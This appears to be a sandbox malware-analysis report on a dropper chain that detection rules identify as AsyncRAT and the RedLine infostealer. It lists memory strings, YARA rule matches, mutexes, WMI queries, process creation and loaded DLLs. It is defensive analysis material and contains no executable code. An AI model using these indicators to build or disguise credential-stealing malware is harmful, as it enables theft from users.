                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  System Summary

                  barindex
                  Source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 3.exe.1.drStatic PE information: section name:
                  Source: r.exe.6.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DBC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DBC2F0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DDB1900_2_00007FF7E1DDB190
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCA4AC0_2_00007FF7E1DCA4AC
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD34840_2_00007FF7E1DD3484
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE07540_2_00007FF7E1DE0754
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DBF9300_2_00007FF7E1DBF930
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC49280_2_00007FF7E1DC4928
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DDCE880_2_00007FF7E1DDCE88
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DB5E240_2_00007FF7E1DB5E24
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD1F200_2_00007FF7E1DD1F20
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DBA3100_2_00007FF7E1DBA310
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DBC2F00_2_00007FF7E1DBC2F0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DB72880_2_00007FF7E1DB7288
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC126C0_2_00007FF7E1DC126C
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD21D00_2_00007FF7E1DD21D0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCF1800_2_00007FF7E1DCF180
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD53F00_2_00007FF7E1DD53F0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DB76C00_2_00007FF7E1DB76C0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF25500_2_00007FF7E1DF2550
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCB5340_2_00007FF7E1DCB534
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DB48400_2_00007FF7E1DB4840
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DEC8380_2_00007FF7E1DEC838
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF5AF80_2_00007FF7E1DF5AF8
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DB1AA40_2_00007FF7E1DB1AA4
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD2AB00_2_00007FF7E1DD2AB0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DEFA940_2_00007FF7E1DEFA94
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC1A480_2_00007FF7E1DC1A48
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE89A00_2_00007FF7E1DE89A0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD39640_2_00007FF7E1DD3964
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCC96C0_2_00007FF7E1DCC96C
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE8C1C0_2_00007FF7E1DE8C1C
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD4B980_2_00007FF7E1DD4B98
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCBB900_2_00007FF7E1DCBB90
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC5B600_2_00007FF7E1DC5B60
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD8DF40_2_00007FF7E1DD8DF4
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE07540_2_00007FF7E1DE0754
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD2D580_2_00007FF7E1DD2D58
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF20800_2_00007FF7E1DF2080
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DCAF180_2_00007FF7E1DCAF18
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B692C61_2_00B692C6
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B77DDC1_2_00B77DDC
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B750111_2_00B75011
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B862A81_2_00B862A8
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B752821_2_00B75282
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B702F71_2_00B702F7
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B782531_2_00B78253
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B713FD1_2_00B713FD
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B864D71_2_00B864D7
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B7742E1_2_00B7742E
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B755B01_2_00B755B0
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B8E6001_2_00B8E600
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B707A71_2_00B707A7
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B788AF1_2_00B788AF
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B6D8331_2_00B6D833
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B6395A1_2_00B6395A
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B8EAAE1_2_00B8EAAE
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B64A8E1_2_00B64A8E
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B92BB41_2_00B92BB4
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B6FCCC1_2_00B6FCCC
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B62EB61_2_00B62EB6
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DE63482_2_00DE6348
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DE84B82_2_00DE84B8
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DE56702_2_00DE5670
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DEAC102_2_00DEAC10
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DE53282_2_00DE5328
                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00DE0BA02_2_00DE0BA0
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00ED92C66_2_00ED92C6
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE7DDC6_2_00EE7DDC
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE50116_2_00EE5011
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE02F76_2_00EE02F7
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF62A86_2_00EF62A8
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE52826_2_00EE5282
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE82536_2_00EE8253
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE13FD6_2_00EE13FD
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF64D76_2_00EF64D7
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE742E6_2_00EE742E
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE55B06_2_00EE55B0
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EFE6006_2_00EFE600
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE07A76_2_00EE07A7
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EE88AF6_2_00EE88AF
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EDD8336_2_00EDD833
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00ED395A6_2_00ED395A
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EFEAAE6_2_00EFEAAE
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00ED4A8E6_2_00ED4A8E
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00F02BB46_2_00F02BB4
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EDFCCC6_2_00EDFCCC
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00ED2EB66_2_00ED2EB6
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_01B5E7B07_2_01B5E7B0
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_01B5DC907_2_01B5DC90
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FD44687_2_06FD4468
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FD96287_2_06FD9628
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FD12107_2_06FD1210
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FD33207_2_06FD3320
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FDDD007_2_06FDDD00
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FDD1087_2_06FDD108
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: String function: 00EEFEFC appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: String function: 00EF07A0 appears 31 times
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: String function: 00EEFFD0 appears 56 times
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: String function: 00B7FEFC appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: String function: 00B807A0 appears 31 times
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: String function: 00B7FFD0 appears 56 times
                  Source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 3.exe.1.drStatic PE information: Section: ZLIB complexity 1.0007113755416155
                  Source: r.exe.6.drStatic PE information: Section: ZLIB complexity 0.9971846443824112
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/48@1/1
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DBB6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7E1DBB6D8
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DD8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7E1DD8624
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMutant created: \Sessions\1\BaseNamedObjects\DPO5yNZvebP2C4hf
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5080953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCommand line argument: sfxname1_2_00B7F05C
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCommand line argument: sfxstime1_2_00B7F05C
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCommand line argument: STARTDLG1_2_00B7F05C
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCommand line argument: sfxname6_2_00EEF05C
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCommand line argument: sfxstime6_2_00EEF05C
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCommand line argument: STARTDLG6_2_00EEF05C
                  Source: KR6CT3hIxT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: r.exe, 00000007.00000002.2165535966.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, tmp2BB4.tmp.7.dr, tmp2BA3.tmp.7.dr, tmp2BD6.tmp.7.dr, tmpF502.tmp.7.dr, tmp2BC6.tmp.7.dr, tmp2BC5.tmp.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: KR6CT3hIxT.exeReversingLabs: Detection: 36%
                  Source: KR6CT3hIxT.exeVirustotal: Detection: 55%
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile read: C:\Users\user\Desktop\KR6CT3hIxT.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\KR6CT3hIxT.exe "C:\Users\user\Desktop\KR6CT3hIxT.exe"
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe"
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeProcess created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe"
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeProcess created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: sppc.dllJump to behavior
